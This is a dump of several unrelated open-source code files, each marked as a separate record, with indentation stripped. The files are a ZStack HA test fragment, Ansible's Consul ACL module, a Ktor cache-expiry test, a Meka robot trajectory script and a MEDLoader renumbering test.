test_stub.destroy_mn_vm(mn_host[0], test_lib.all_scenario_config)
new_mn_host = test_stub.get_host_by_mn_vm(test_lib.all_scenario_config, test_lib.scenario_file)
if len(new_mn_host) == 0:
test_util.test_logger("mn vm was destroyed successfully")
else:
test_util.test_fail("mn vm was not destroyed successfully")
test_util.test_logger("wait for 20 seconds to see if management node VM starts on one host")
time.sleep(20)
new_mn_host_ip = test_stub.get_host_by_consul_leader(test_lib.all_scenario_config, test_lib.scenario_file)
if new_mn_host_ip == "":# or new_mn_host_ip != mn_host[0].ip_:
test_util.test_fail("management node VM not run correctly on [%s] after its former host [%s] down for 20s" % (new_mn_host_ip, mn_host[0].ip_))
count = 60
while count > 0:
new_mn_host = test_stub.get_host_by_mn_vm(test_lib.all_scenario_config, test_lib.scenario_file)
if len(new_mn_host) == 1:
test_util.test_logger("management node VM run after its former host down for 30s")
break
elif len(new_mn_host) > 1:
test_util.test_fail("management node VM runs on more than one host after its former host down")
time.sleep(5)
count -= 1
if len(new_mn_host) == 0:
test_util.test_fail("management node VM does not run after its former host down for 30s")
elif len(new_mn_host) > 1:
test_util.test_fail("management node VM runs on more than one host after its former host down")
#node_ops.wait_for_management_server_start(300)
test_stub.wrapper_of_wait_for_management_server_start(600)
test_stub.ensure_hosts_connected()
test_stub.ensure_pss_connected()
test_stub.ensure_bss_connected()
test_stub.return_pass_ahead_if_3sites("TEST PASS")
vm = test_stub.create_basic_vm()
vm.check()
vm.destroy()
test_util.test_pass('Create VM Test Success')
#Will be called what ever test result is
def env_recover():
test_stub.wait_for_mn_ha_ready(test_lib.all_scenario_config, test_lib.scenario_file)
#Will be called only if exception happens in test().
def error_cleanup():
global vm
if vm:
try:
vm.destroy()
except:
pass
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/python
#
# (c) 2015, Steve Gargan <steve.gargan@gmail.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
module: consul_acl
short_description: Manipulate Consul ACL keys and rules
description:
- Allows the addition, modification and deletion of ACL keys and associated
rules in a consul cluster via the agent. For more details on using and
configuring ACLs, see https://www.consul.io/docs/guides/acl.html.
version_added: "2.0"
author:
- Steve Gargan (@sgargan)
- Colin Nolan (@colin-nolan)
options:
mgmt_token:
description:
- a management token is required to manipulate the acl lists
state:
description:
- whether the ACL pair should be present or absent
required: false
choices: ['present', 'absent']
default: present
token_type:
description:
- the type of token that should be created, either management or client
choices: ['client', 'management']
default: client
name:
description:
- the name that should be associated with the acl key, this is opaque
to Consul
required: false
token:
description:
- the token key indentifying an ACL rule set. If generated by consul
this will be a UUID
required: false
rules:
description:
- a list of the rules that should be associated with a given token
required: false
host:
description:
- host of the consul agent defaults to localhost
required: false
default: localhost
port:
description:
- the port on which the consul agent is running
required: false
default: 8500
scheme:
description:
- the protocol scheme on which the consul agent is running
required: false
default: http
version_added: "2.1"
validate_certs:
description:
- whether to verify the tls certificate of the consul agent
required: false
default: True
version_added: "2.1"
requirements:
- "python >= 2.6"
- python-consul
- pyhcl
- requests
"""
EXAMPLES = """
- name: create an ACL with rules
consul_acl:
host: consul1.example.com
mgmt_token: some_management_acl
name: Foo access
rules:
- key: "foo"
policy: read
- key: "private/foo"
policy: deny
- name: create an ACL with a specific token
consul_acl:
host: consul1.example.com
mgmt_token: some_management_acl
name: Foo access
token: my-token
rules:
- key: "foo"
policy: read
- name: update the rules associated to an ACL token
consul_acl:
host: consul1.example.com
mgmt_token: some_management_acl
name: Foo access
token: some_client_token
rules:
- event: "bbq"
policy: write
- key: "foo"
policy: read
- key: "private"
policy: deny
- keyring: write
- node: "hgs4"
policy: write
- operator: read
- query: ""
policy: write
- service: "consul"
policy: write
- session: "standup"
policy: write
- name: remove a token
consul_acl:
host: consul1.example.com
mgmt_token: some_management_acl
token: 172bd5c8-9fe9-11e4-b1b0-3c15c2c9fd5e
state: absent
"""
RETURN = """
token:
description: the token associated to the ACL (the ACL's ID)
returned: success
type: string
sample: a2ec332f-04cf-6fba-e8b8-acf62444d3da
rules:
description: the HCL JSON representation of the rules associated to the ACL, in the format described in the
Consul documentation (https://www.consul.io/docs/guides/acl.html#rule-specification).
returned: I(status) == "present"
type: string
sample: {
"key": {
"foo": {
"policy": "write"
},
"bar": {
"policy": "deny"
}
}
}
operation:
description: the operation performed on the ACL
returned: changed
type: string
sample: update
"""
try:
import consul
python_consul_installed = True
except ImportError:
python_consul_installed = False
try:
import hcl
pyhcl_installed = True
except ImportError:
pyhcl_installed = False
try:
from requests.exceptions import ConnectionError
has_requests = True
except ImportError:
has_requests = False
from collections import defaultdict
from ansible.module_utils.basic import to_text, AnsibleModule
RULE_SCOPES = ["agent", "event", "key", "keyring", "node", "operator", "query", "service", "session"]
MANAGEMENT_PARAMETER_NAME = "mgmt_token"
HOST_PARAMETER_NAME = "host"
SCHEME_PARAMETER_NAME = "scheme"
VALIDATE_CERTS_PARAMETER_NAME = "validate_certs"
NAME_PARAMETER_NAME = "name"
PORT_PARAMETER_NAME = "port"
RULES_PARAMETER_NAME = "rules"
STATE_PARAMETER_NAME = "state"
TOKEN_PARAMETER_NAME = "token"
TOKEN_TYPE_PARAMETER_NAME = "token_type"
PRESENT_STATE_VALUE = "present"
ABSENT_STATE_VALUE = "absent"
CLIENT_TOKEN_TYPE_VALUE = "client"
MANAGEMENT_TOKEN_TYPE_VALUE = "management"
REMOVE_OPERATION = "remove"
UPDATE_OPERATION = "update"
CREATE_OPERATION = "create"
_POLICY_JSON_PROPERTY = "policy"
_RULES_JSON_PROPERTY = "Rules"
_TOKEN_JSON_PROPERTY = "ID"
_TOKEN_TYPE_JSON_PROPERTY = "Type"
_NAME_JSON_PROPERTY = "Name"
_POLICY_YML_PROPERTY = "policy"
_POLICY_HCL_PROPERTY = "policy"
_ARGUMENT_SPEC = {
MANAGEMENT_PARAMETER_NAME: dict(required=True, no_log=True),
HOST_PARAMETER_NAME: dict(default='localhost'),
SCHEME_PARAMETER_NAME: dict(required=False, default='http'),
VALIDATE_CERTS_PARAMETER_NAME: dict(required=False, type='bool', default=True),
NAME_PARAMETER_NAME: dict(required=False),
PORT_PARAMETER_NAME: dict(default=8500, type='int'),
RULES_PARAMETER_NAME: dict(default=None, required=False, type='list'),
STATE_PARAMETER_NAME: dict(default=PRESENT_STATE_VALUE, choices=[PRESENT_STATE_VALUE, ABSENT_STATE_VALUE]),
TOKEN_PARAMETER_NAME: dict(required=False),
TOKEN_TYPE_PARAMETER_NAME: dict(required=False, choices=[CLIENT_TOKEN_TYPE_VALUE, MANAGEMENT_TOKEN_TYPE_VALUE],
default=CLIENT_TOKEN_TYPE_VALUE)
}
def set_acl(consul_client, configuration):
"""
Sets an ACL based on the given configuration.
:param consul_client: the consul client
:param configuration: the run configuration
:return: the output of setting the ACL
"""
acls_as_json = decode_acls_as_json(consul_client.acl.list())
existing_acls_mapped_by_name = dict((acl.name, acl) for acl in acls_as_json if acl.name is not None)
existing_acls_mapped_by_token = dict((acl.token, acl) for acl in acls_as_json)
if None in existing_acls_mapped_by_token:
raise AssertionError("expecting ACL list to be associated to a token: %s" %
existing_acls_mapped_by_token[None])
if configuration.token is None and configuration.name and configuration.name in existing_acls_mapped_by_name:
# No token but name given so can get token from name
configuration.token = existing_acls_mapped_by_name[configuration.name].token
if configuration.token and configuration.token in existing_acls_mapped_by_token:
return update_acl(consul_client, configuration)
else:
if configuration.token in existing_acls_mapped_by_token:
raise AssertionError()
if configuration.name in existing_acls_mapped_by_name:
raise AssertionError()
return create_acl(consul_client, configuration)
def update_acl(consul_client, configuration):
"""
Updates an ACL.
:param consul_client: the consul client
:param configuration: the run configuration
:return: the output of the update
"""
existing_acl = load_acl_with_token(consul_client, configuration.token)
changed = existing_acl.rules != configuration.rules
if changed:
name = configuration.name if configuration.name is not None else existing_acl.name
rules_as_hcl = encode_rules_as_hcl_string(configuration.rules)
updated_token = consul_client.acl.update(
configuration.token, name=name, type=configuration.token_type, rules=rules_as_hcl)
if updated_token != configuration.token:
raise AssertionError()
return Output(changed=changed, token=configuration.token, rules=configuration.rules, operation=UPDATE_OPERATION)
def create_acl(consul_client, configuration):
"""
Creates an ACL.
:param consul_client: the consul client
:param configuration: the run configuration
:return: the output of the creation
"""
rules_as_hcl = encode_rules_as_hcl_string(configuration.rules) if len(configuration.rules) > 0 else None
token = consul_client.acl.create(
name=configuration.name, type=configuration.token_type, rules=rules_as_hcl, acl_id=configuration.token)
rules = configuration.rules
return Output(changed=True, token=token, rules=rules, operation=CREATE_OPERATION)
def remove_acl(consul, configuration):
"""
Removes an ACL.
:param consul: the consul client
:param configuration: the run configuration
:return: the output of the removal
"""
token = configuration.token
changed = consul.acl.info(token) is not None
if changed:
consul.acl.destroy(token)
return Output(changed=changed, token=token, operation=REMOVE_OPERATION)
def load_acl_with_token(consul, token):
"""
Loads the ACL with the given token (token == rule ID).
:param consul: the consul client
:param token: the ACL "token"/ID (not name)
:return: the ACL associated to the given token
:exception ConsulACLTokenNotFoundException: raised if the given token does not exist
"""
acl_as_json = consul.acl.info(token)
if acl_as_json is None:
raise ConsulACLNotFoundException(token)
return decode_acl_as_json(acl_as_json)
def encode_rules_as_hcl_string(rules):
"""
Converts the given rules into the equivalent HCL (string) representation.
:param rules: the rules
:return: the equivalent HCL (string) representation of the rules. Will be None if there is no rules (see internal
note for justification)
"""
if len(rules) == 0:
# Note: empty string is not valid HCL according to `hcl.load` however, the ACL `Rule` property will be an empty
# string if there is no rules...
return None
rules_as_hcl = ""
for rule in rules:
rules_as_hcl += encode_rule_as_hcl_string(rule)
return rules_as_hcl
def encode_rule_as_hcl_string(rule):
"""
Converts the given rule into the equivalent HCL (string) representation.
:param rule: the rule
:return: the equivalent HCL (string) representation of the rule
"""
if rule.pattern is not None:
return '%s "%s" {\n %s = "%s"\n}\n' % (rule.scope, rule.pattern, _POLICY_HCL_PROPERTY, rule.policy)
else:
return '%s = "%s"\n' % (rule.scope, rule.policy)
def decode_rules_as_hcl_string(rules_as_hcl):
"""
Converts the given HCL (string) representation of rules into a list of rule domain models.
:param rules_as_hcl: the HCL (string) representation of a collection of rules
:return: the equivalent domain model to the given rules
"""
rules_as_hcl = to_text(rules_as_hcl)
rules_as_json = hcl.loads(rules_as_hcl)
return decode_rules_as_json(rules_as_json)
def decode_rules_as_json(rules_as_json):
"""
Converts the given JSON representation of rules into a list of rule domain models.
:param rules_as_json: the JSON representation of a collection of rules
:return: the equivalent domain model to the given rules
"""
rules = RuleCollection()
for scope in rules_as_json:
if not isinstance(rules_as_json[scope], dict):
rules.add(Rule(scope, rules_as_json[scope]))
else:
for pattern, policy in rules_as_json[scope].items():
rules.add(Rule(scope, policy[_POLICY_JSON_PROPERTY], pattern))
return rules
def encode_rules_as_json(rules):
"""
Converts the given rules into the equivalent JSON representation according to the documentation:
https://www.consul.io/docs/guides/acl.html#rule-specification.
:param rules: the rules
:return: JSON representation of the given rules
"""
rules_as_json = defaultdict(dict)
for rule in rules:
if rule.pattern is not None:
if rule.pattern in rules_as_json[rule.scope]:
raise AssertionError()
rules_as_json[rule.scope][rule.pattern] = {
_POLICY_JSON_PROPERTY: rule.policy
}
else:
if rule.scope in rules_as_json:
raise AssertionError()
rules_as_json[rule.scope] = rule.policy
return rules_as_json
def decode_rules_as_yml(rules_as_yml):
"""
Converts the given YAML representation of rules into a list of rule domain models.
:param rules_as_yml: the YAML representation of a collection of rules
:return: the equivalent domain model to the given rules
"""
rules = RuleCollection()
if rules_as_yml:
for rule_as_yml in rules_as_yml:
rule_added = False
for scope in RULE_SCOPES:
if scope in rule_as_yml:
if rule_as_yml[scope] is None:
raise ValueError("Rule for '%s' does not have a value associated to the scope" % scope)
policy = rule_as_yml[_POLICY_YML_PROPERTY] if _POLICY_YML_PROPERTY in rule_as_yml \
else rule_as_yml[scope]
pattern = rule_as_yml[scope] if _POLICY_YML_PROPERTY in rule_as_yml else None
rules.add(Rule(scope, policy, pattern))
rule_added = True
break
if not rule_added:
raise ValueError("A rule requires one of %s and a policy." % ('/'.join(RULE_SCOPES)))
return rules
def decode_acl_as_json(acl_as_json):
"""
Converts the given JSON representation of an ACL into the equivalent domain model.
:param acl_as_json: the JSON representation of an ACL
:return: the equivalent domain model to the given ACL
"""
rules_as_hcl = acl_as_json[_RULES_JSON_PROPERTY]
rules = decode_rules_as_hcl_string(acl_as_json[_RULES_JSON_PROPERTY]) if rules_as_hcl.strip() != "" \
else RuleCollection()
return ACL(
rules=rules,
token_type=acl_as_json[_TOKEN_TYPE_JSON_PROPERTY],
token=acl_as_json[_TOKEN_JSON_PROPERTY],
name=acl_as_json[_NAME_JSON_PROPERTY]
)
def decode_acls_as_json(acls_as_json):
"""
Converts the given JSON representation of ACLs into a list of ACL domain models.
:param acls_as_json: the JSON representation of a collection of ACLs
:return: list of equivalent domain models for the given ACLs (order not guaranteed to be the same)
"""
return [decode_acl_as_json(acl_as_json) for acl_as_json in acls_as_json]
class ConsulACLNotFoundException(Exception):
"""
Exception raised if an ACL with is not found.
"""
class Configuration:
"""
Configuration for this module.
"""
def __init__(self, management_token=None, host=None, scheme=None, validate_certs=None, name=None, port=None,
rules=None, state=None, token=None, token_type=None):
self.management_token = management_token # type: str
self.host = host # type: str
self.scheme = scheme # type: str
self.validate_certs = validate_certs # type: bool
self.name = name # type: str
self.port = port # type: bool
self.rules = rules # type: RuleCollection
self.state = state # type: str
self.token = token # type: str
self.token_type = token_type # type: str
class Output:
"""
Output of an action of this module.
"""
def __init__(self, changed=None, token=None, rules=None, operation=None):
self.changed = changed # type: bool
self.token = token # type: str
self.rules = rules # type: RuleCollection
self.operation = operation # type: str
class ACL:
"""
Consul ACL. See: https://www.consul.io/docs/guides/acl.html.
"""
def __init__(self, rules, token_type, token, name):
self.rules = rules
self.token_type = token_type
self.token = token
self.name = name
def __eq__(self, other):
return other \
and isinstance(other, self.__class__) \
and self.rules == other.rules \
and self.token_type == other.token_type \
and self.token == other.token \
and self.name == other.name
def __hash__(self):
return hash(self.rules) ^ hash(self.token_type) ^ hash(self.token) ^ hash(self.name)
class Rule:
"""
ACL rule. See: https://www.consul.io/docs/guides/acl.html#acl-rules-and-scope.
"""
def __init__(self, scope, policy, pattern=None):
self.scope = scope
self.policy = policy
self.pattern = pattern
def __eq__(self, other):
return isinstance(other, self.__class__) \
and self.scope == other.scope \
and self.policy == other.policy \
and self.pattern == other.pattern
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return (hash(self.scope) ^ hash(self.policy)) ^ hash(self.pattern)
def __str__(self):
return encode_rule_as_hcl_string(self)
class RuleCollection:
"""
Collection of ACL rules, which are part of a Consul ACL.
"""
def __init__(self):
self._rules = {}
for scope in RULE_SCOPES:
self._rules[scope] = {}
def __iter__(self):
all_rules = []
for scope, pattern_keyed_rules in self._rules.items():
for pattern, rule in pattern_keyed_rules.items():
all_rules.append(rule)
return iter(all_rules)
def __len__(self):
count = 0
for scope in RULE_SCOPES:
count += len(self._rules[scope])
return count
def __eq__(self, other):
return isinstance(other, self.__class__) \
and set(self) == set(other)
def __ne__(self, other):
return not self.__eq__(other)
def __str__(self):
return encode_rules_as_hcl_string(self)
def add(self, rule):
"""
Adds the given rule to this collection.
:param rule: model of a rule
:raises ValueError: raised if there already exists a rule for a given scope and pattern
"""
if rule.pattern in self._rules[rule.scope]:
patten_info = " and pattern '%s'" % rule.pattern if rule.pattern is not None else ""
raise ValueError("Duplicate rule for scope '%s'%s" % (rule.scope, patten_info))
self._rules[rule.scope][rule.pattern] = rule
def get_consul_client(configuration):
"""
Gets a Consul client for the given configuration.
Does not check if the Consul client can connect.
:param configuration: the run configuration
:return: Consul client
"""
token = configuration.management_token
if token is None:
token = configuration.token
if token is None:
raise AssertionError("Expecting the management token to always be set")
return consul.Consul(host=configuration.host, port=configuration.port, scheme=configuration.scheme,
verify=configuration.validate_certs, token=token)
def check_dependencies():
"""
Checks that the required dependencies have been imported.
:exception ImportError: if it is detected that any of the required dependencies have not been iported
"""
if not python_consul_installed:
raise ImportError("python-consul required for this module. "
"See: http://python-consul.readthedocs.org/en/latest/#installation")
if not pyhcl_installed:
raise ImportError("pyhcl required for this module. "
"See: https://pypi.python.org/pypi/pyhcl")
if not has_requests:
raise ImportError("requests required for this module. See https://pypi.python.org/pypi/requests")
def main():
"""
Main method.
"""
module = AnsibleModule(_ARGUMENT_SPEC, supports_check_mode=False)
try:
check_dependencies()
except ImportError as e:
module.fail_json(msg=str(e))
configuration = Configuration(
management_token=module.params.get(MANAGEMENT_PARAMETER_NAME),
host=module.params.get(HOST_PARAMETER_NAME),
scheme=module.params.get(SCHEME_PARAMETER_NAME),
validate_certs=module.params.get(VALIDATE_CERTS_PARAMETER_NAME),
name=module.params.get(NAME_PARAMETER_NAME),
port=module.params.get(PORT_PARAMETER_NAME),
rules=decode_rules_as_yml(module.params.get(RULES_PARAMETER_NAME)),
state=module.params.get(STATE_PARAMETER_NAME),
token=module.params.get(TOKEN_PARAMETER_NAME),
token_type=module.params.get(TOKEN_TYPE_PARAMETER_NAME)
)
consul_client = get_consul_client(configuration)
try:
if configuration.state == PRESENT_STATE_VALUE:
output = set_acl(consul_client, configuration)
else:
output = remove_acl(consul_client, configuration)
except ConnectionError as e:
module.fail_json(msg='Could not connect to consul agent at %s:%s, error was %s' % (
configuration.host, configuration.port, str(e)))
raise
return_values = dict(changed=output.changed, token=output.token, operation=output.operation)
if output.rules is not None:
return_values["rules"] = encode_rules_as_json(output.rules)
module.exit_json(**return_values)
if __name__ == "__main__":
main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
* Copyright 2014-2024 JetBrains s.r.o and contributors. Use of this source code is governed by the Apache 2.0 license.
*/
package io.ktor.client.plugins.cache.tests
import io.ktor.client.call.*
import io.ktor.client.plugins.cache.*
import io.ktor.client.statement.*
import io.ktor.client.utils.*
import io.ktor.http.*
import io.ktor.util.date.*
import io.ktor.utils.io.*
import kotlin.coroutines.*
import kotlin.test.*
class CacheExpiresTest {
@Test
fun testValidExpirationDate() {
val dateText = "Tue, 27 Oct 2020 15:21:07 GMT"
val parsed = dateText.fromHttpToGmtDate()
val response = response {
append(HttpHeaders.Expires, dateText)
}
val result = response.cacheExpires(false)
assertEquals(parsed, result)
}
@Test
fun testInvalidExpirationDate() {
val dateText = "A1231242323532452345"
val expected = GMTDate.START
val response = response {
append(HttpHeaders.Expires, dateText)
}
val result = response.cacheExpires(false) { expected }
assertEquals(expected, result)
}
@Test
fun testInvalidExpirationDateZero() {
val dateText = "0"
val expected = GMTDate.START
val response = response {
append(HttpHeaders.Expires, dateText)
}
val result = response.cacheExpires(false) { expected }
assertEquals(expected, result)
}
@Test
fun testInvalidExpirationDateEmpty() {
val dateText = ""
val expected = GMTDate.START
val response = response {
append(HttpHeaders.Expires, dateText)
}
val result = response.cacheExpires(false) { expected }
assertEquals(expected, result)
}
@Test
fun testInvalidExpirationDateBlank() {
val dateText = " "
val expected = GMTDate.START
val response = response {
append(HttpHeaders.Expires, dateText)
}
val result = response.cacheExpires(false) { expected }
assertEquals(expected, result)
}
@Test
fun testMaxAgePrivate() {
val now = GMTDate(10)
val response = response(now) {
append(HttpHeaders.CacheControl, "s-maxage=5, max-age=15")
}
val result = response.cacheExpires(false)
assertEquals(GMTDate(now.timestamp + 15 * 1000), result)
}
@Test
fun testMaxAgeShared() {
val now = GMTDate(10)
val response = response(now) {
append(HttpHeaders.CacheControl, "s-maxage=5, max-age=15")
}
val result = response.cacheExpires(true)
assertEquals(GMTDate(now.timestamp + 5 * 1000), result)
}
@Test
fun testMaxAgeSharedNoSMaxAge() {
val now = GMTDate(10)
val response = response(now) {
append(HttpHeaders.CacheControl, "max-age=15")
}
val result = response.cacheExpires(true)
assertEquals(GMTDate(now.timestamp + 15 * 1000), result)
}
private fun response(requestTime: GMTDate = GMTDate(), builder: HeadersBuilder.() -> Unit): HttpResponse {
return Response(buildHeaders(builder), requestTime)
}
private class Response(
override val headers: Headers,
override val requestTime: GMTDate = GMTDate()
) : HttpResponse() {
override val call: HttpClientCall get() = error("Shouldn't be used")
override val status: HttpStatusCode
get() = error("Shouldn't be used")
override val version: HttpProtocolVersion
get() = error("Shouldn't be used")
override val responseTime: GMTDate
get() = error("Shouldn't be used")
@OptIn(InternalAPI::class)
override val rawContent: ByteReadChannel
get() = error("Shouldn't be used")
override val coroutineContext: CoroutineContext
get() = error("Shouldn't be used")
}
}
|
kotlin
|
github
|
https://github.com/ktorio/ktor
|
ktor-client/ktor-client-core/common/test/CacheExpiresTest.kt
|
#! /usr/bin/python
#Copyright 2010, Meka Robotics
#All rights reserved.
#http://mekabot.com
#Redistribution and use in source and binary forms, with or without
#modification, are permitted.
#THIS SOFTWARE IS PROVIDED BY THE Copyright HOLDERS AND CONTRIBUTORS
#"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
#LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
#FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
#Copyright OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
#INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES INCLUDING,
#BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
#LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
#CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
#LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
#ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
#POSSIBILITY OF SUCH DAMAGE.
import time
import m3.rt_proxy as m3p
import m3.toolbox as m3t
import m3.component_factory as m3f
import os
import sys
import yaml
import m3.trajectory as m3jt
import numpy as nu
import m3.gui as m3g
import m3.toolbox as m3t
import m3.viz as m3v
# #####################################################
def load_vias():
via_files=m3t.get_via_files()
via_names=m3t.get_via_names()
if len(via_files)==0:
print 'No via files available'
return
print 'Enter file IDX'
print '-----------------------'
for i in range(len(via_names)):
print i,' : ',via_names[i]
idx=m3t.get_int(0)
if idx>=0 and idx<len(via_names):
f=file(via_files[idx],'r')
d=yaml.safe_load(f.read())
return d
return None
# ######################################################
print 'Enable RVIZ? [n]'
pub=None
rviz = m3t.get_yes_no('n')
# ######################################################
proxy = m3p.M3RtProxy()
proxy.start()
bot_name=m3t.get_robot_name()
if bot_name == "":
print 'Error: no robot components found:', bot_name
quit
bot=m3f.create_component(bot_name)
if rviz == True:
viz = m3v.M3Viz(proxy, bot)
proxy.subscribe_status(bot)
proxy.publish_command(bot)
proxy.make_operational_all()
bot.set_motor_power_on()
proxy.step()
if rviz == True:
viz.step()
print 'Select chains:'
chains = m3t.user_select_components_interactive(bot.get_available_chains(),single=False)
# ######################################################
#Hardcode defaults for now...should move to config file
stiffness={
'right_arm':[
0.5, #J0
0.5, #J1
0.5, #J2
0.5, #J3
0.5, #J4
0.5, #J5
0.5],#J6
'left_arm':[
0.5, #J0
0.5, #J1
0.5, #J2
0.5, #J3
0.5, #J4
0.5, #J5
0.5],#J6
'torso':[
0.65, #J0
0.65, #J1
0.65]}#J2
#Deg/S
vel_avg={
'right_arm':[
40.0, #J0
40.0, #J1
40.0, #J2
40.0, #J3
40.0, #J4
40.0, #J5
40.0],#J6
'left_arm':[
40.0, #J0
40.0, #J1
40.0, #J2
40.0, #J3
40.0, #J4
40.0, #J5
40.0],#J6
'torso':[
5.0, #J0
5.0, #J1
5.0]}#J2
scale_stiffness={'right_arm': 1.0,'left_arm':1.0,'torso':1.0}
scale_vel_avg={'right_arm': 1.0,'left_arm':1.0,'torso':1.0}
use_theta_gc=True
# ######################################################
vias={}
for c in chains:
vias[c]=[]
while True:
proxy.step()
print '--------------'
#print 'p: execute splined vias (python)'
print 'e: execute trajectory (rt)'
#print 'm: execute minimum jerk'
#print 'd: execute direct THETA_GC mode'
print 'l: load via file'
print 'd: display vias'
print 'v: scale avg velocity'
print 's: set stiffness'
print 'm: set control mode'
print 'q: quit'
print '--------------'
print
k=m3t.get_keystroke()
print
if k=='q':
break
if k=='r':
vias=record_vias()
if k=='l':
v=load_vias()
for c in chains:
vias[c]=v[c]['postures']
if k=='m':
print 'Use mode THETA_GC [y]?'
use_theta_gc= m3t.get_yes_no('y')
if k=='d':
print '-------- Mode ---------'
if use_theta_gc:
print 'Currently in mode: THETA_GC'
else:
print 'Currently in mode: THETA'
print '------ Scaling --------'
print 'Stiffness: ',stiffness
print 'Vel avg: ',scale_vel_avg
print '--------- Vias --------'
print vias
if k=='v':
print 'Select chain'
c = m3t.user_select_components_interactive(chains,single=True)[0]
print 'Current scale for',c,': ',scale_vel_avg[c]
print 'New scale: (0-2.0)'
scale_vel_avg[c]=max(0,min(2.0,m3t.get_float()))
if k=='s':
print 'Current stiffness'
print '--------------------'
for c in chains:
print c,' : ',stiffness[c]
print
print 'Select chain'
c = m3t.user_select_components_interactive(chains,single=True)[0]
print 'Enter stiffness: '
s=max(0,min(1.0,m3t.get_float()))
stiffness[c]=[s]*len(stiffness[c])
print 'New stiffness: ',c,' : ',stiffness[c]
if k=='e':
use_chain={}
done=True
for c in chains:
print 'Use ',c,'[y]?'
use_chain[c]= m3t.get_yes_no('y')
if use_chain[c] and len(vias[c]):
ndof=bot.get_num_dof(c)
done=False
for v in vias[c]:
print 'Adding via',v,'for',c
va=nu.array(vel_avg[c])*scale_vel_avg[c]
bot.add_splined_traj_via_deg(c,v,va)
#bot.add_splined_traj_via_deg(c,[0.0]*ndof,va) #return home
#print 'Adding via',[0.0]*ndof,'for',c
if use_theta_gc:
bot.set_mode_splined_traj_gc(c)
ss=[max(0.0,min(1.0,scale_stiffness[c]*x)) for x in stiffness[c]]
bot.set_stiffness(c,ss)
else:
bot.set_mode_splined_traj(c)
bot.set_slew_rate_proportion(c, [1.0]*ndof)
ts=time.time()
print 'Hit enter when ready...'
raw_input()
while not done:
done=True
for c in chains:
if use_chain[c] and not bot.is_splined_traj_complete(c):
done=False
print 'Running...',time.time()-ts
proxy.step()
if rviz == True:
viz.step()
time.sleep(0.1)
time.sleep(1.0)
for c in chains:
bot.set_mode_off(c)
proxy.step()
if k=='p':
if len(vias):
pass
#ndof=bot.get_num_dof(arm_name)
#jt = m3jt.JointTrajectory(ndof)
#for v in vias:
#print 'Adding via',v
#jt.add_via_deg(v, [vel_avg]*ndof)
#print 'Adding via',[0.0]*ndof
#jt.add_via_deg([0.0]*ndof, [vel_avg]*ndof)
#bot.set_motor_power_on()
#bot.set_mode_theta_gc(arm_name)
#bot.set_stiffness(arm_name,[stiffness]*ndof)
#ts=time.time()
#jt.start([0]*ndof, [0]*ndof)
#print 'hit any key to start!'
#z=m3t.get_keystroke()
#while not jt.is_splined_traj_complete():
#q = jt.step()
#print q
#bot.set_theta_deg(arm_name, q)
#proxy.step()
#ros_publish()
#print 'Running...',time.time()-ts
#time.sleep(0.1)
#proxy.pretty_print_component('m3sea_wrist_ma2_j6')#chain.name)
proxy.stop()
if rviz == True:
viz.stop()
# ######################################################
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
# -*- coding: iso-8859-1 -*-
# Copyright (C) 2007-2014 CEA/DEN, EDF R&D
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# See http://www.salome-platform.org/ or email : webmaster.salome@opencascade.com
#
from MEDLoader import *
import os
import sys
import unittest
class RenumberingTest(unittest.TestCase):
def testBoost2D(self):
filename="Test2D.med"
meshname="Mesh_1"
method="BOOST"
string_to_execute=self.dir_renumber+" "+self.dir_mesh+"/"+filename+" "+meshname+" "+method+" "+self.dir_mesh+"/out_"+filename
os.system(string_to_execute)
mm=MEDFileMesh.New(self.dir_mesh+"/out_"+filename,meshname)
m=mm.getMeshAtLevel(0)
ff=MEDFileField1TS(self.dir_mesh+"/out_"+filename,"Test field")
field_ini=DataArrayDouble([(2,3),(12,13),(14,15),(4,5),(6,7),(8,9),(16,17),(0,1),(10,11)])
ff.getFieldOnMeshAtLevel(ON_CELLS,0,mm)
f=ff.getFieldOnMeshAtLevel(ON_CELLS,0,mm)
field=f.getArray().isEqual(field_ini,1e-15)
connectivite=[4,1,5,12,10,4,10,12,13,11,4,5,4,14,12,4,11,13,9,3,4,12,14,15,13,4,4,0,6,14,4,13,15,8,9,4,14,6,7,15,4,15,7,2,8]
connectivite_index=[0,5,10,15,20,25,30,35,40,45]
Boost2D=m.getNodalConnectivity().getValues()==connectivite and m.getNodalConnectivityIndex().getValues()==connectivite_index and field
self.assertTrue(Boost2D)
os.remove(self.dir_mesh+"/out_"+filename)
pass
def tessMetis2D(self):#not activated yet
filename="Test2D.med"
meshname="Mesh_1"
method="METIS"
string_to_execute=self.dir_renumber+" "+self.dir_mesh+"/"+filename+" "+meshname+" "+method+" "+self.dir_mesh+"/out_"+filename
os.system(string_to_execute)
m = MESH(MED_DRIVER,self.dir_mesh+"/out_"+filename,meshname)
